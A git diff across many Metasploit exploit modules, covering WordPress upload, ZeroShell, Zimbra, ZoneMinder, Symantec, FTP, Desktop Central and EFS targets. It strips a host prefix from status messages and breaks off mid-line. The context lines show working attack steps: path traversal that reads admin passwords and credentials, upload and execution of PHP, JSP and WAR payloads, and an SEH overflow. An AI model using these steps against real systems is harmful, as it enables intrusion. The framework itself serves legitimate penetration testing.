else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Server did not answer") end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) }, 5 diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb index 5643f7fef8..b9077a1de7 100644 --- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote # forward to profile.php or other page? if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(nonce, nil, nil, 'form-data; name="wp_nonce"') post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_ajax, @@ -117,29 +117,29 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login as #{user}") + print_status("Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as #{user}") + print_error("Unable to login as #{user}") return end - print_status("#{peer} - Trying to get nonce") + print_status("Trying to get nonce") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - print_status("#{peer} - Got nonce #{nonce}") + print_status("Got nonce #{nonce}") - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") file_path = upload_file(cookie, nonce) if file_path.nil? - print_error("#{peer} - Error uploading file") + print_error("Error uploading file") return end - print_status("#{peer} - Calling uploaded file #{file_path}") + print_status("Calling uploaded file #{file_path}") send_request_cgi( 'uri' => file_path, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb index e48bbf5a9d..e12dd578c5 100644 --- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb +++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_uri = normalize_uri(target_uri.path, wp_content_dir, 'uploads', 'wysija', 'themes', theme_name, payload_name) - print_status("#{peer} - Uploading payload to #{payload_uri}") + print_status("Uploading payload to #{payload_uri}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, @@ -108,9 +108,9 @@ class Metasploit3 < Msf::Exploit::Remote # the theme folder (manual cleanup) register_files_for_cleanup('style.css', payload_name) - print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.") + print_warning("The theme folder #{theme_name} can not be removed. Please delete it manually.") - print_status("#{peer} - Executing payload #{payload_uri}") + print_status("Executing payload #{payload_uri}") send_request_cgi( 'uri' => payload_uri, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index 410ba14ceb..1a4f6f9ab5 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << "\r\n" post_data << "--#{boundary}--\r\n" - print_status("#{peer} - Sending PHP payload (#{@payload_name})") + print_status("Sending PHP payload (#{@payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}?upload", @@ -110,11 +110,11 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 302 - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{@payload_name})") + print_status("Executing PHP payload (#{@payload_name})") # Execute our payload res = send_request_cgi({ @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb index 2fb30b494a..6af43f873a 100644 --- a/modules/exploits/unix/webapp/zeroshell_exec.rb +++ b/modules/exploits/unix/webapp/zeroshell_exec.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect ZeroShell") + print_status("Trying to detect ZeroShell") res = send_request_cgi({ 'method' => 'GET', @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieve admin password using unauthenticated LFI def password rootpw = "../../../var/register/system/ldap/rootpw" - print_status("#{peer} - Retrieving cleartext admin password") + print_status("Retrieving cleartext admin password") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"), @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body !~ /not found/ res.body =~ /^(.*)$/ pass = $1 - print_status("#{peer} - Password retrieved [ #{pass} ]") + print_status("Password retrieved [ #{pass} ]") return pass else return nil @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote # Login using the retrieved password and grab the session key from the response body. def login(admin_password) - print_status("#{peer} - Log in and retrieving session key") + print_status("Log in and retrieving session key") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"), @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /STk=([a-zA-Z0-9]+)&Action/ sessionkey = $1 - print_status("#{peer} - Session key retrieved [ #{sessionkey} ]") + print_status("Session key retrieved [ #{sessionkey} ]") return sessionkey else fail_with(Failure::Unknown, "#{peer} - Retrieving session key failed!") diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb index c126de0f39..0cb88957e1 100644 --- a/modules/exploits/unix/webapp/zimbra_lfi.rb +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting login credentials...") + print_status("Getting login credentials...") res = send_traversal_query(traversal_path("conf/localconfig.xml")) unless res and res.code == 200 @@ -115,8 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials") end - print_good("#{peer} - Got login credentials!") - print_status("#{peer} - Getting auth token...") + print_good("Got login credentials!") + print_status("Getting auth token...") soap_req = build_soap_req(zimbra_user, zimbra_pass) #lets get our hands foamy @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote end @cookie = "ZM_ADMIN_AUTH_TOKEN=#{auth_token}" - print_good("#{peer} - Got auth token!") + print_good("Got auth token!") #the initial POC for this vuln shows user creation with admin rights for the web interface, thats cool but a shell is even cooler #the web interface has a function to upload the latest version of the desktop client via /service/extension/clientUploader/upload/ @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_elf = generate_payload_exe #upload payload - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = upload_file(payload_name, payload_elf) unless res and res.code == 200 @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote end #upload jsp stager - print_status("#{peer} - Uploading jsp stager") + print_status("Uploading jsp stager") res = upload_file(stager_name, stager) unless res and res.code == 200 @@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote "../jetty/webapps/zimbra/downloads/#{payload_name}" ) - print_status("#{peer} - Executing payload on /downloads/#{stager_name}") + print_status("Executing payload on /downloads/#{stager_name}") res = send_request_cgi({ 'uri' => normalize_uri("downloads", stager_name), diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index 5add6e428a..8f26104b4e 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "action=login&view=version&username=#{user}&password=#{pass}" # login and retrieve software version - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 if res.body =~ /<title>ZM - Login<\/title>/ - vprint_error("#{peer} - Service found, but authentication failed") + vprint_error("Service found, but authentication failed") return Exploit::CheckCode::Detected elsif res.body =~ /v1.2(4\.\d+|5\.0)/ return Exploit::CheckCode::Appears @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote command = Rex::Text.uri_encode(payload.encoded) # login - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -121,10 +121,10 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unreachable, "#{peer} - Connection failed") end - print_good("#{peer} - Authenticated successfully") + print_good("Authenticated successfully") # send payload - print_status("#{peer} - Sending payload (#{command.length} bytes)") + print_status("Sending payload (#{command.length} bytes)") begin res = send_request_cgi({ 'method' => 'POST', @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => "#{cookie}" }) if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index 5a398002a8..fa69d395d3 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -138,18 +138,18 @@ class Metasploit3 < Msf::Exploit::Remote base = target_uri.path token, sid = get_csfr_info(base) - vprint_status("#{peer} - Token=#{token}, SID=#{sid}") + vprint_status("Token=#{token}, SID=#{sid}") user_salt_cookie = login(base, token, sid) - print_good("#{peer} - Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_good("Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") vars = {'module'=>'htpasswd', 'selected'=>'Selected', 'path'=>'/'} cookie = "#{sid}; #{user_salt_cookie}" token = get_csfr_info(base, '', cookie, vars)[0] - vprint_status("#{peer} - Token=#{token}, SID=#{sid}") + vprint_status("Token=#{token}, SID=#{sid}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") exec(base, token, sid, user_salt_cookie) end diff --git a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb index b85a120157..376be876bb 100644 --- a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb +++ b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload") + print_status("Sending payload") # Execute the cmdstager, max length of the commands is ~3950 execute_cmdstager({:flavor => :vbs, :linemax => 3950}) end diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index d215a55d1a..5822a09417 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -229,21 +229,21 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Leaking the JBoss deployment directory...") + print_status("Leaking the JBoss deployment directory...") jboss_path =jboss_deploy_path if jboss_path.nil? fail_with(Failure::Unknown, "#{peer} - Failed to disclose the JBoss deployment directory") end - print_status("#{peer} - Building WAR payload...") + print_status("Building WAR payload...") app_name = Rex::Text.rand_text_alpha(4 + rand(4)) war_name = "#{app_name}.war" war = payload.encoded_war({ :app_name => app_name }).to_s deploy_dir = "..#{jboss_path}" - print_status("#{peer} - Uploading WAR payload...") + print_status("Uploading WAR payload...") res = upload_war(war_name, war, deploy_dir) diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb index e73e7c3d6e..ab833037cc 100644 --- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb +++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb @@ -71,12 +71,12 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -88,28 +88,28 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) - print_status("#{peer} - Sending empty login...") + print_status("Sending empty login...") res = send_user("", conn) if not res or res !~ /331/ - print_error("#{peer} - Error sending username") + print_error("Error sending username") return false end res = send_pass("", conn) if not res or res !~ /230/ - print_error("#{peer} - Error sending password") + print_error("Error sending password") return false end - print_good("#{peer} - Empty authentication was successful") + print_good("Empty authentication was successful") # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file diff --git a/modules/exploits/windows/ftp/open_ftpd_wbem.rb b/modules/exploits/windows/ftp/open_ftpd_wbem.rb index 75d677b645..53fd3231d5 100644 --- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb +++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb @@ -80,11 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) if not conn fail_with(Failure::Unreachable, "#{@peer} - Connection failed") end # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -115,13 +115,13 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file send_cmd(['STOR', filename], false, conn) - print_good("#{peer} - Upload successful") + print_good("Upload successful") disconnect(conn) end diff --git a/modules/exploits/windows/ftp/quickshare_traversal_write.rb b/modules/exploits/windows/ftp/quickshare_traversal_write.rb index a051ee3057..043b6c2ccf 100644 --- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb +++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") # We can't use connect_login, because it cannot determine a successful login correctly. # For example: The server actually returns a 503 (Bad Sequence of Commands) when the @@ -106,18 +106,18 @@ class Metasploit3 < Msf::Exploit::Remote res = send_user(datastore['FTPUSER'], conn) if res !~ /^(331|2)/ - vprint_error("#{peer} - The server rejected our username: #{res.to_s}") + vprint_error("The server rejected our username: #{res.to_s}") return false end res = send_pass(datastore['FTPPASS'], conn) if res !~ /^(2|503)/ - vprint_error("#{peer} - The server rejected our password: #{res.to_s}") + vprint_error("The server rejected our password: #{res.to_s}") return false end # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file diff --git a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb index 5b80f89d7f..edefcd67a2 100644 --- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb +++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote password = datastore['PASSWORD'] @session_cookie = authenticate(username, password) - print_status("#{peer} - Sending payload") + print_status("Sending payload") # Execute the cmdstager, max length of the commands is ~1500 execute_cmdstager(flavor: :vbs, linemax: 1500) end @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote end def authenticate(username, password) - print_status("#{peer} - Authenticating") + print_status("Authenticating") res = send_request_cgi( 'uri' => '/admin_loginok.html', 'method' => 'POST', diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb index ac211221c8..ee569d496f 100644 --- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb +++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb @@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Removing #{@payload_path}") + print_warning("Removing #{@payload_path}") cli.fs.file.rm(@payload_path) - print_good("#{peer} - #{@payload_path} deleted") + print_good("#{@payload_path} deleted") rescue ::Exception => e print_error("Unable to delete #{@payload_path}: #{e.message}") end @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # UPLOAD # attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx" - print_status("#{peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...") + print_status("Uploading #{aspx_b64.length} bytes through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, @@ -137,9 +137,9 @@ class Metasploit3 < Msf::Exploit::Remote payload_url = "" @payload_path = "" if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/ - print_good("#{peer} - Payload uploaded successfuly") + print_good("Payload uploaded successfuly") else - print_error("#{peer} - Payload upload failed") + print_error("Payload upload failed") return end @@ -147,15 +147,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/ @payload_path = $1 - print_status("#{peer} - Payload stored on #{@payload_path}") + print_status("Payload stored on #{@payload_path}") else - print_error("#{peer} - The payload file path couldn't be retrieved") + print_error("The payload file path couldn't be retrieved") end if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/ payload_url = URI($1).path else - print_error("#{peer} - The payload URI couldn't be retrieved... Aborting!") + print_error("The payload URI couldn't be retrieved... Aborting!") return end @@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote # # EXECUTE # - print_status("#{peer} - Executing #{payload_url}...") + print_status("Executing #{payload_url}...") res = send_request_cgi({ 'uri' => payload_url, @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (!res or (res and res.code != 200)) - print_error("#{peer} - Execution failed on #{payload_url} [No Response]") + print_error("Execution failed on #{payload_url} [No Response]") return end diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb index eab4067731..d9efe9d560 100644 --- a/modules/exploits/windows/http/cogent_datahub_command.rb +++ b/modules/exploits/windows/http/cogent_datahub_command.rb @@ -392,10 +392,10 @@ class Metasploit3 < Msf::Exploit::Remote end def primer - print_status("#{peer} - Sending injection...") + print_status("Sending injection...") res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll") if res - print_error("#{peer} - Unexpected answer") + print_error("Unexpected answer") end end @@ -433,10 +433,10 @@ class Metasploit3 < Msf::Exploit::Remote host = $1 share_name = $2 dll_name = $3 - print_status("#{peer} - Sending injection...") + print_status("Sending injection...") res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}") if res - print_error("#{peer} - Unexpected answer") + print_error("Unexpected answer") end else fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.dll') diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index 14427fd950..a0747c46a7 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote path = File.dirname("#{target_uri.path}/.") b64_version = get_version(path) if b64_version.empty? - vprint_error("#{peer} - Unable to determine the version number") + vprint_error("Unable to determine the version number") else b64_version = Rex::Text.decode_base64(b64_version) if b64_version =~ /^[0-6]\.1/ @@ -131,11 +131,11 @@ class Metasploit3 < Msf::Exploit::Remote # b64_version = get_version(path) if b64_version.empty? - print_error("#{peer} - Unable to determine the version number") + print_error("Unable to determine the version number") return end - print_status("#{peer} - Obtained version: #{Rex::Text.decode_base64(b64_version)}") + print_status("Obtained version: #{Rex::Text.decode_base64(b64_version)}") # # Prepare our payload (naughty exe embedded in php) @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Inject payload # - print_status("#{peer} - Injecting PHP payload...") + print_status("Injecting PHP payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => path, @@ -163,10 +163,10 @@ class Metasploit3 < Msf::Exploit::Remote # # Load our payload # - print_status("#{peer} - Loading payload: #{path}#{b64_version}/#{@php_fname}") + print_status("Loading payload: #{path}#{b64_version}/#{@php_fname}") send_request_raw({'uri'=>"#{path}#{b64_version}/#{@php_fname}"}) if res and res.code == 404 - print_error("#{peer} - Server returned 404, the upload attempt probably failed.") + print_error("Server returned 404, the upload attempt probably failed.") return end diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index 040045c4b4..5525b7fb10 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -83,15 +83,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 - print_status("#{peer} - Detected Desktop Central v7") + print_status("Detected Desktop Central v7") elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions) build = $1 - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else # DC v8 (earlier versions) - print_status("#{peer} - Detected Desktop Central v8") + print_status("Detected Desktop Central v8") end elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?) build = $1 @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha_lower(8) + ".exe" @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(dropper_filename), diff --git a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb index 4534cad6c1..079cdae430 100644 --- a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb @@ -61,15 +61,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 - print_status("#{peer} - Detected Desktop Central v7") + print_status("Detected Desktop Central v7") elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions) build = $1 - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else # DC v8 (earlier versions) - print_status("#{peer} - Detected Desktop Central v8") + print_status("Detected Desktop Central v8") end elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?) build = $1 @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha_lower(8) + ".exe" @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(exe_filename) register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{jsp_name}") - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(jsp_name), diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index 06e9747b3f..853bc561cd 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote if not version return Exploit::CheckCode::Safe end - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" if version !~ /^(2\.\d|3\.0|3\.1)$/ return Exploit::CheckCode::Safe end @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote if not path return Exploit::CheckCode::Detected end - vprint_status "#{peer} - Found path: #{path}" + vprint_status "Found path: #{path}" return Exploit::CheckCode::Appears end @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote # get target if target.name =~ /Automatic/ version = get_version - vprint_status "#{peer} - Found version: #{version}" if version + vprint_status "Found version: #{version}" if version if not version or version !~ /^(2\.\d|3\.0|3\.1)$/ fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target") elsif version =~ /(2\.0)/ @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Could not retrieve install path") end path << "\\users\\" - vprint_status "#{peer} - Using path: #{path}" + vprint_status "Using path: #{path}" # send payload sploit = rand_text_alpha(256 - path.length) sploit << generate_seh_payload(my_target.ret) - print_status "#{peer} - Sending request (#{sploit.length} bytes) to target (#{my_target.name})" + print_status "Sending request (#{sploit.length} bytes) to target (#{my_target.name})" send_request_cgi({ 'uri' => '/chat.ghp', 'encode_params' => false, diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb index ab43eac27d..c71ee36629 100644 --- a/modules/exploits/windows/http/efs_fmws_userid_bof.rb +++ 